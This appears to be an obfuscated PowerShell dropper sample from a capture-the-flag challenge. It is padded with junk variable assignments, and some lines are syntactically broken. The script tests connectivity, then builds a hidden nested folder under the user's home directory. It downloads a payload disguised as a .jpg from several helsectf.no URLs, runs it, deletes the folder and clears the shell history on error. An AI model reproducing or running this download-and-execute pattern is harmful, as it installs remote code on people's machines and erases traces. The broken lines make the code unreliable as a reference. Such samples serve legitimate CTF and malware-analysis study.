$HUE6EF3qJ = $loO35 + $XA6KSLfs;
$G83nbt55u = ('8.8.8.8').rePlAcE('=',"eVil.Com");


$L22z0D = $dmP5ubAHG + $eE3C9kXk;
$HOV9pCZ6 = $fowcrXGu + $wHTOx;

sV  ('mMfcSZy9T3') (SysTEm.IO.DIrecToRy);

$vizvGvv = $ho0GPRxaj + $tY75r;

$S2x7DYv9Q = ('https://helsectf.no/bilder/1_17178dd7h59fa2e8970c573fb9e19fd71.jpg@https://helsectf.no/bilder/2_596b32a0810862cce7367229919b9f6f.jpg@https://helsectf.no/bilder/3_31f7e7f712f50e0834c8f238c09ae.jpg@https://helsectf.no/bilder/4_7e3e1aa2c4b222a143ad3429c4842305.jpg@https://helsectf.no/bilder/5_29638154b8c2b437f59c005364d076cc.jpg')

Sv  ('bgoqpZ') ('SysTEm.IO.File'));

$ahBEmWpJ = $PrCur9lya + $OuRqb;
$psM0ETe = $AMlYB + $gVHW8YHNBv;

$cT2La = (($HOME +"ILsC3MxUjZvsvILs04LeWqYUCqILsUG5AgxvK6ILsNrjJbCsuILslYnmhyVNAz" ).REplACE( "ILs",[stRiNg][cHaR]92));
cT2La = $HOME\C3MxUjZvsv\04LeWqYUCq\UG5AgxvK6\NrjJbCsu\lYnmhyVNAz

$SvVBimVNU = $Y1yXgq + $OAMLdZY;
$rQid5 = $cT2La+"yM2eomx.jpg";
$W5IFVGlB = $296HWw + $KGneW2Vs9;

IF(test-coNnEction -qUiet $G83nbt55u) {$mMfcSZy9T3::"crEAtEdIRECToRy"( $cT2La);
try{fOReaCh 
	($sorYf0zoo in $S2x7DYv9Q.ReplACE('GramMaRly','.exE').splIT("@".Split([chAR]124).rEPlace($BoI5Q,$vMQxk))
		{if($bgoqpZ::Exists($rQid5))
			{break}Invoke-WebRequest -Uri $sorYf0zoo -OutFile $rQid5}
				start $rQid5; 
				Start-Sleep -s 1;
				rEMoVE-iTeM -RecURSe -path  ($HoMe+"\"+$cT2La.replace($Home+"\",$utlLEl).split([string][char]92)[0]);}
	catch{clear-history;echo "Do or do not, there is no try."};
}else{= aDd-TYPE -aSsEmbLYNamE 'PrEsentatIoNFRaMEWorK';
	[SySTEM.wiNDoWS.mesSaGebOX]::ShoW("D blir ittj fest og fart, uten internett og bart...");
